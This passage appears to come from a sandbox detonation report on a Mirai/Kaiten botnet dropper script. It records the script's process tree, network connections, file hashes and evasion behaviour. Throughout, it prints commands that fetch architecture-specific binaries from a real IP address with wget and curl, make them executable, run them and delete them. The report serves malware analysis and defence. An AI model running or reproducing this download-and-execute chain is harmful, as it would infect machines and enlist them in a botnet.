[rm -rf /tmp/GoldAge3ATOx64]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx64.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOx86 -O /tmp/GoldAge3ATOx86]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOx86 -o /tmp/GoldAge3ATOx86]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOx86]

/tmp/GoldAge3ATOx86

[/tmp/GoldAge3ATOx86]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx86]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx86.1]

/usr/bin/wget

[wget http://185.236.24.192/bash -O /tmp/bash]

/usr/bin/curl

[curl http://185.236.24.192/bash -o /tmp/bash]

/bin/chmod

[chmod +x /tmp/bash]

/tmp/bash

[/tmp/bash]

/bin/rm

[rm -rf /tmp/bash]

/bin/rm

[rm -rf /tmp/bash.1]

Network

Country Destination Domain Proto
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp

Files

/tmp/GoldAge3ATOarm

MD5 c37a156e474db5c40f0affd035ee358f
SHA1 990bc43195246650ee6929c2c40afe7efa14d058
SHA256 18a3befd33ac144b1ae8ece9be2fa9517df8ea4ef62b0d210cce7b6b7e263876
SHA512 ebaf7a2ab1644ac755384051f172408586a16bbbbe1c5e1b99c2981d90ced4e9689467e57b2a042fd0b92a7ba7de6022e92f765a8f3cbf55623d97ff48dc34d6

/tmp/GoldAge3ATOarm5

MD5 d8e7f95f2de61c8a75cf9cf7777ba06d
SHA1 040e5656fed375ef1c7e253822f0edb3f350616b
SHA256 392ca33932bec6f83bd53b51970eecf5ef8ff6ca0f47ffa640beff921c20a2db
SHA512 6e1c39b175b90612d16b18c687af41045072578f0e80246c849809c3fb83a584184d47fd8d55654c563e38c46108e1ef84012f61d3c82a2d733ac3e644a34dc8

/tmp/GoldAge3ATOarm6

MD5 3c5c66502403c26ffd38c305e0073e56
SHA1 584b0a7b269f9e07d3d1ca9880b8710f035e435a
SHA256 f2a18d1a418690bfe26ff26db63fa327bd1c142a1fc3508960dfa75a194ac900
SHA512 48732ec0cb0abb84b63539bfc5fe4f0b2e3a4c40b384bec72b3c66d960b65844c5b6e5bc2d56b547542e5662e5f56bef6640f5f2b14c945e21ad0bd15ef09e89

/tmp/GoldAge3ATOarm7

MD5 d1bc7e87209a400dfa40307eca08289a
SHA1 b9922e7972f0c46ecbcc18503b37b46299d3eaf9
SHA256 7bc58e1c54dd5971bab649122ec1b0816ed621fc5a2d437d6994fe7eda4a395b
SHA512 258792c9507a36217af3cbc76d77c1f21f8d0c3dffc18e492779faf44d8c7d6f9dca1f01dfe8255f4e727e414065c8f1aa5f4b9f73405d0023fadb0600f5da50

/tmp/GoldAge3ATOm68k

MD5 b9e708d1101756b3452ff33eaaa984f9
SHA1 f7744930aa85da6dbf7785c91e01e419987ce4e5
SHA256 7c6f4467faa1c72f79a1c531fcb1619fa65aec4ce7c8cb2936552f1b06ed9cc1
SHA512 1372ee01debf96dc8dce942a3d5ade2217d86ced03f4d666687a792c1fbff28000a4041734b11037e1559138d57a92c4a33074b65e7bf719d1828d4ef2bb78fa

/tmp/GoldAge3ATOmips

MD5 db3d52d93de2b229748c916d261ca0d5
SHA1 29889196802fe35c0e5933991bd7f4a89de56946
SHA256 75c9cf0d001e46db32ff206a3595bddf61851db6c4a803e2233f2b348c969de5
SHA512 405b1b673e23f4fabe7f124101d0aa66e9d71b561260d5164bc29d76e74ae9dab58f7330b1860ccf27fde664d087408cd73f1c9429c2bf0af815c8f0f0ee6652

/tmp/GoldAge3ATOmpsl

MD5 2439dbad4a1cb56d7ea54b35aa36251e
SHA1 b9d2099aaab3868094bb20bf556b3b20e8ea5203
SHA256 050c88a81f61024402a9353deb359ca014d1cae2c699998223f5855d8fcaf552
SHA512 32ca9cee3d237c4920cf1ef3f4e0e2bd0b11698317f9030caf909ab8b74198cb3f4b5d18051c7ee168fec32fc925c059c1ab714fe530e13b600a787fcc67dc25

/tmp/GoldAge3ATOppc

MD5 92038a8e6f1123573cf5cd61d21f61ed
SHA1 cf01a5b89a91b6af3c7da41a3ade8e7a8e0d1083
SHA256 a93f71d045ede0d3d2ae06183f1f6f2d37a47122aed4fafeaafecb4a05f6afe8
SHA512 00f1a4365a51fa1a06a7e2d1222554049e35caf894898daf1e44f6a3e9962c50c4aa01840f91e21a443d6640c348decd8178070921acf9f13f91b5ff73915567

/tmp/GoldAge3ATOsh4

MD5 5eba0470ee235a99e4b34517333a1cd1
SHA1 0e417be4cc0769c9480f245941c2f0463147d1fd
SHA256 ffd3b51636907bb20012b0e954a100e3c57e97ae1b2ba7d3af521cf09f5ea5bb
SHA512 5dc3454c6fa7a7b53d7f8d7230f62866f6ae2bca9f3c74263e622676457f61ea623fb711a8d1ea84fda52dc6be1375af62359d6672b3335ccbd4633e1ca2b468

/tmp/GoldAge3ATOspc

MD5 dfcc2c1625e3a1788667a70ca731dedb
SHA1 bdc644788b8599579d8ce88e47270dc67839b226
SHA256 37999177b9eeb0ffbf4b074065e61ad01f22182a9ac102ddbcfc754d966b65b3
SHA512 1c13023098df56eeafde489642a65918250cb92889d564a94178645c544a7fb2cb478aa6e3a9b349ac872ba6cfd4c98b2c31dcafecadbfb1061352984c214d57

/tmp/GoldAge3ATOx64

MD5 399037675ef247197dec6471d9bfbf57
SHA1 1fa81b589ee9e8764216b386e4fd5d1d3738bc39
SHA256 9d5a6901e239005e00d80dbc77c7a5c764ea6ca89d4d56ed973676acfb6a5298
SHA512 68b4279897b60f8019bb33d12e50cf55dae3bc337cc5033aefcfe9275b7f33e31a88a773875d10b5a69243178f936f0ba278410870f7e04bd72eaf360cf1fda1

/tmp/GoldAge3ATOx86

MD5 b6fe48263b89bb87446e76bb55170f26
SHA1 d88d976b1701dafe670a07313f14d3f217855850
SHA256 68373bd10e71b2cc7e292480ef48a8ca039ecabf25919fcbef3c70b88cd9231c
SHA512 7e920ebe6209cb785ced9772b4ce046f32bae16b1a3f73ffe821aa0c5978a0ca0e86a9b609c7b1305ef52e2329fb394282a9da5b0ae6fbbb7ec367036281681b

/tmp/bash

MD5 89ce675ecc4ca2e46f1c412a7074aaf9
SHA1 cbd5de6624cfd3d76e4cb72eb49938c6b12b2f1d
SHA256 c2cdab77264c2bda90a1e150dad77a827183d358f51fbf2325282293809e6ad8
SHA512 a962bc08019f778d59d30ceab2d2c13e9e70d08b559b174ac0b63e0de98c248d1ca16ee1b2ae76e3bade67d493d12d8fabd7385fcc8427ad962d8f3785571a31

Analysis: behavioral1

Detonation Overview

Submitted

2025-05-20 17:08

Reported

2025-05-20 17:10

Platform

ubuntu1804-amd64-20250410-en

Max time kernel

149s

Max time network

150s

Command Line

[/tmp/x.sh]

Signatures

Detects Kaiten/Tsunami Payload

Description Indicator Process Target
N/A N/A N/A N/A

Detects Kaiten/Tsunami payload

Description Indicator Process Target
N/A N/A N/A N/A

Kaiten family

kaiten

Kaiten/Tsunami

botnet kaiten

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/GoldAge3ATOarm /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOarm5 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOarm6 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOarm7 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOm68k /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOmips /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOmpsl /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOppc /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOsh4 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOspc /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOx64 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOx86 /tmp/x.sh N/A
N/A /tmp/bash /tmp/x.sh N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/misc/watchdog /tmp/x.sh N/A
File opened for modification /dev/watchdog /tmp/GoldAge3ATOx64 N/A
File opened for modification /dev/misc/watchdog /tmp/GoldAge3ATOx64 N/A
File opened for modification /dev/watchdog /tmp/x.sh N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 84.162.70.65 N/A N/A

Enumerates active TCP sockets

discovery
Description Indicator Process Target
File opened for reading /proc/net/tcp /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/net/tcp /tmp/x.sh N/A

Enumerates running processes

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself shhssabbbahasbssash /tmp/GoldAge3ATOx64 N/A
Changes the process name, possibly in an attempt to hide itself N/A /tmp/x.sh N/A

Reads system network configuration

discovery
Description Indicator Process Target
File opened for reading /proc/net/tcp /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/net/tcp /tmp/x.sh N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/951/fd /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/408/fd /tmp/x.sh N/A
File opened for reading /proc/427/fd /tmp/x.sh N/A
File opened for reading /proc/1085/fd /tmp/x.sh N/A
File opened for reading /proc/1498/exe /tmp/x.sh N/A
File opened for reading /proc/407/exe /tmp/x.sh N/A
File opened for reading /proc/450/exe /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/681/exe /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/1667/exe /tmp/x.sh N/A
File opened for reading /proc/2012/exe /tmp/x.sh N/A
File opened for reading /proc/2100/exe /tmp/x.sh N/A
File opened for reading /proc/1581/fd /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/406/fd /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/955/fd /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/1041/fd /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/485/fd /tmp/x.sh N/A
File opened for reading /proc/1337/fd /tmp/x.sh N/A
File opened for reading /proc/525/exe /tmp/x.sh N/A
File opened for reading /proc/2278/exe /tmp/x.sh N/A
File opened for reading /proc/446/fd /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/1318/fd /tmp/x.sh N/A
File opened for reading /proc/640/fd /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/1060/fd /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/1171/fd /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/1078/fd /tmp/x.sh N/A
File opened for reading /proc/434/exe /tmp/x.sh N/A
File opened for reading /proc/1695/exe /tmp/x.sh N/A
File opened for reading /proc/1964/exe /tmp/x.sh N/A
File opened for reading /proc/2165/exe /tmp/x.sh N/A
File opened for reading /proc/1243/fd /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/899/fd /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/667/fd /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/719/fd /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/1059/fd /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/681/exe /tmp/x.sh N/A
File opened for reading /proc/913/exe /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/1595/exe /tmp/x.sh N/A
File opened for reading /proc/1594/exe /tmp/x.sh N/A
File opened for reading /proc/1469/fd /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/549/fd /tmp/x.sh N/A
File opened for reading /proc/568/fd /tmp/x.sh N/A
File opened for reading /proc/1033/exe /tmp/x.sh N/A
File opened for reading /proc/1496/exe /tmp/x.sh N/A
File opened for reading /proc/1583/exe /tmp/x.sh N/A
File opened for reading /proc/1584/exe /tmp/x.sh N/A
File opened for reading /proc/1067/fd /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/1118/fd /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/1033/fd /tmp/x.sh N/A
File opened for reading /proc/1151/fd /tmp/x.sh N/A
File opened for reading /proc/1364/fd /tmp/x.sh N/A
File opened for reading /proc/1683/exe /tmp/x.sh N/A
File opened for reading /proc/2022/exe /tmp/x.sh N/A
File opened for reading /proc/2297/exe /tmp/x.sh N/A
File opened for reading /proc/1079/fd /tmp/GoldAge3ATOx64 N/A
File opened for reading /proc/404/exe /tmp/x.sh N/A
File opened for reading /proc/1027/fd /tmp/x.sh N/A
File opened for reading /proc/1067/fd /tmp/x.sh N/A
File opened for reading /proc/1923/exe /tmp/x.sh N/A
File opened for reading /proc/1995/exe /tmp/x.sh N/A
File opened for reading /proc/2295/exe /tmp/x.sh N/A
File opened for reading /proc/410/fd /tmp/x.sh N/A
File opened for reading /proc/602/fd /tmp/x.sh N/A
File opened for reading /proc/1057/fd /tmp/x.sh N/A
File opened for reading /proc/1239/fd /tmp/x.sh N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/GoldAge3ATOmips N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/GoldAge3ATOppc /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOspc /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOx64 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOx86 /usr/bin/wget N/A
File opened for modification /tmp/bash /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm5 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOarm6 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOm68k /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOx64 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOx86 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOm68k /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOppc /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOsh4 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOspc /usr/bin/wget N/A
File opened for modification /tmp/bash /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOarm /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOarm5 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm6 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm7 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOmips /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOmips /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOsh4 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm7 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOmpsl /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOmpsl /usr/bin/curl N/A

Processes

/tmp/x.sh

[/tmp/x.sh]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm -O /tmp/GoldAge3ATOarm]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm -o /tmp/GoldAge3ATOarm]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm]

/tmp/GoldAge3ATOarm

[/tmp/GoldAge3ATOarm]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm5 -O /tmp/GoldAge3ATOarm5]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm5 -o /tmp/GoldAge3ATOarm5]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm5]

/tmp/GoldAge3ATOarm5

[/tmp/GoldAge3ATOarm5]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm5]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm5.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm6 -O /tmp/GoldAge3ATOarm6]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm6 -o /tmp/GoldAge3ATOarm6]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm6]

/tmp/GoldAge3ATOarm6

[/tmp/GoldAge3ATOarm6]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm6]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm6.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm7 -O /tmp/GoldAge3ATOarm7]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm7 -o /tmp/GoldAge3ATOarm7]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm7]

/tmp/GoldAge3ATOarm7

[/tmp/GoldAge3ATOarm7]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm7]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm7.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOm68k -O /tmp/GoldAge3ATOm68k]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOm68k -o /tmp/GoldAge3ATOm68k]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOm68k]

/tmp/GoldAge3ATOm68k

[/tmp/GoldAge3ATOm68k]

/bin/rm

[rm -rf /tmp/GoldAge3ATOm68k]

/bin/rm

[rm -rf /tmp/GoldAge3ATOm68k.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOmips -O /tmp/GoldAge3ATOmips]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOmips -o /tmp/GoldAge3ATOmips]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOmips]

/tmp/GoldAge3ATOmips

[/tmp/GoldAge3ATOmips]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmips]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmips.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOmpsl -O /tmp/GoldAge3ATOmpsl]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOmpsl -o /tmp/GoldAge3ATOmpsl]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOmpsl]

/tmp/GoldAge3ATOmpsl

[/tmp/GoldAge3ATOmpsl]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmpsl]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmpsl.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOppc -O /tmp/GoldAge3ATOppc]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOppc -o /tmp/GoldAge3ATOppc]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOppc]

/tmp/GoldAge3ATOppc

[/tmp/GoldAge3ATOppc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOppc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOppc.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOsh4 -O /tmp/GoldAge3ATOsh4]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOsh4 -o /tmp/GoldAge3ATOsh4]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOsh4]

/tmp/GoldAge3ATOsh4

[/tmp/GoldAge3ATOsh4]

/bin/rm

[rm -rf /tmp/GoldAge3ATOsh4]

/bin/rm

[rm -rf /tmp/GoldAge3ATOsh4.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOspc -O /tmp/GoldAge3ATOspc]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOspc -o /tmp/GoldAge3ATOspc]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOspc]

/tmp/GoldAge3ATOspc

[/tmp/GoldAge3ATOspc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOspc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOspc.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOx64 -O /tmp/GoldAge3ATOx64]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOx64 -o /tmp/GoldAge3ATOx64]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOx64]

/tmp/GoldAge3ATOx64

[/tmp/GoldAge3ATOx64]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx64]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx64.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOx86 -O /tmp/GoldAge3ATOx86]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOx86 -o /tmp/GoldAge3ATOx86]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOx86]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx86]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx86.1]

/usr/bin/wget

[wget http://185.236.24.192/bash -O /tmp/bash]

/usr/bin/curl

[curl http://185.236.24.192/bash -o /tmp/bash]

/bin/chmod

[chmod +x /tmp/bash]

/tmp/bash

[/tmp/bash]

/bin/rm

[rm -rf /tmp/bash]

/bin/rm

[rm -rf /tmp/bash.1]

Network

Country Destination Domain Proto
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 3.210.102.181:443 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
N/A 224.0.0.251:5353 udp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
GB 89.187.167.38:443 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:27501 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:27501 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
AU 1.1.1.1:53 1527653184.rsc.cdn77.org udp
AU 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.42:443 1527653184.rsc.cdn77.org tcp
FI 185.236.24.192:27501 tcp
FI 185.236.24.192:27501 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:14567 tcp
AU 1.1.1.1:53 connectivity-check.ubuntu.com udp
AU 1.1.1.1:53 connectivity-check.ubuntu.com udp
AU 1.1.1.1:53 local udp
AU 1.1.1.1:53 local udp
GB 185.125.190.96:80 connectivity-check.ubuntu.com tcp
DE 84.162.70.65:53 udp
AU 1.1.1.1:53 connectivity-check.ubuntu.com udp
AU 1.1.1.1:53 local udp
AU 1.1.1.1:53 local udp
US 91.189.91.98:80 connectivity-check.ubuntu.com tcp
AU 1.1.1.1:53 connectivity-check.ubuntu.com udp
AU 1.1.1.1:53 connectivity-check.ubuntu.com udp
AU 1.1.1.1:53 local udp
AU 1.1.1.1:53 local udp
GB 185.125.190.18:80 connectivity-check.ubuntu.com tcp

Files

/tmp/GoldAge3ATOarm

MD5 c37a156e474db5c40f0affd035ee358f
SHA1 990bc43195246650ee6929c2c40afe7efa14d058
SHA256 18a3befd33ac144b1ae8ece9be2fa9517df8ea4ef62b0d210cce7b6b7e263876
SHA512 ebaf7a2ab1644ac755384051f172408586a16bbbbe1c5e1b99c2981d90ced4e9689467e57b2a042fd0b92a7ba7de6022e92f765a8f3cbf55623d97ff48dc34d6

/tmp/GoldAge3ATOarm5

MD5 d8e7f95f2de61c8a75cf9cf7777ba06d
SHA1 040e5656fed375ef1c7e253822f0edb3f350616b
SHA256 392ca33932bec6f83bd53b51970eecf5ef8ff6ca0f47ffa640beff921c20a2db
SHA512 6e1c39b175b90612d16b18c687af41045072578f0e80246c849809c3fb83a584184d47fd8d55654c563e38c46108e1ef84012f61d3c82a2d733ac3e644a34dc8

/tmp/GoldAge3ATOarm6

MD5 3c5c66502403c26ffd38c305e0073e56
SHA1 584b0a7b269f9e07d3d1ca9880b8710f035e435a
SHA256 f2a18d1a418690bfe26ff26db63fa327bd1c142a1fc3508960dfa75a194ac900
SHA512 48732ec0cb0abb84b63539bfc5fe4f0b2e3a4c40b384bec72b3c66d960b65844c5b6e5bc2d56b547542e5662e5f56bef6640f5f2b14c945e21ad0bd15ef09e89

/tmp/GoldAge3ATOarm7

MD5 d1bc7e87209a400dfa40307eca08289a
SHA1 b9922e7972f0c46ecbcc18503b37b46299d3eaf9
SHA256 7bc58e1c54dd5971bab649122ec1b0816ed621fc5a2d437d6994fe7eda4a395b
SHA512 258792c9507a36217af3cbc76d77c1f21f8d0c3dffc18e492779faf44d8c7d6f9dca1f01dfe8255f4e727e414065c8f1aa5f4b9f73405d0023fadb0600f5da50

/tmp/GoldAge3ATOm68k

MD5 b9e708d1101756b3452ff33eaaa984f9
SHA1 f7744930aa85da6dbf7785c91e01e419987ce4e5
SHA256 7c6f4467faa1c72f79a1c531fcb1619fa65aec4ce7c8cb2936552f1b06ed9cc1
SHA512 1372ee01debf96dc8dce942a3d5ade2217d86ced03f4d666687a792c1fbff28000a4041734b11037e1559138d57a92c4a33074b65e7bf719d1828d4ef2bb78fa

/tmp/GoldAge3ATOmips

MD5 db3d52d93de2b229748c916d261ca0d5
SHA1 29889196802fe35c0e5933991bd7f4a89de56946
SHA256 75c9cf0d001e46db32ff206a3595bddf61851db6c4a803e2233f2b348c969de5
SHA512 405b1b673e23f4fabe7f124101d0aa66e9d71b561260d5164bc29d76e74ae9dab58f7330b1860ccf27fde664d087408cd73f1c9429c2bf0af815c8f0f0ee6652

/tmp/GoldAge3ATOmpsl

MD5 2439dbad4a1cb56d7ea54b35aa36251e
SHA1 b9d2099aaab3868094bb20bf556b3b20e8ea5203
SHA256 050c88a81f61024402a9353deb359ca014d1cae2c699998223f5855d8fcaf552
SHA512 32ca9cee3d237c4920cf1ef3f4e0e2bd0b11698317f9030caf909ab8b74198cb3f4b5d18051c7ee168fec32fc925c059c1ab714fe530e13b600a787fcc67dc25

/tmp/GoldAge3ATOppc

MD5 92038a8e6f1123573cf5cd61d21f61ed
SHA1 cf01a5b89a91b6af3c7da41a3ade8e7a8e0d1083
SHA256 a93f71d045ede0d3d2ae06183f1f6f2d37a47122aed4fafeaafecb4a05f6afe8
SHA512 00f1a4365a51fa1a06a7e2d1222554049e35caf894898daf1e44f6a3e9962c50c4aa01840f91e21a443d6640c348decd8178070921acf9f13f91b5ff73915567

/tmp/GoldAge3ATOsh4

MD5 5eba0470ee235a99e4b34517333a1cd1
SHA1 0e417be4cc0769c9480f245941c2f0463147d1fd
SHA256 ffd3b51636907bb20012b0e954a100e3c57e97ae1b2ba7d3af521cf09f5ea5bb
SHA512 5dc3454c6fa7a7b53d7f8d7230f62866f6ae2bca9f3c74263e622676457f61ea623fb711a8d1ea84fda52dc6be1375af62359d6672b3335ccbd4633e1ca2b468

/tmp/GoldAge3ATOspc

MD5 dfcc2c1625e3a1788667a70ca731dedb
SHA1 bdc644788b8599579d8ce88e47270dc67839b226
SHA256 37999177b9eeb0ffbf4b074065e61ad01f22182a9ac102ddbcfc754d966b65b3
SHA512 1c13023098df56eeafde489642a65918250cb92889d564a94178645c544a7fb2cb478aa6e3a9b349ac872ba6cfd4c98b2c31dcafecadbfb1061352984c214d57

/tmp/GoldAge3ATOx64

MD5 399037675ef247197dec6471d9bfbf57
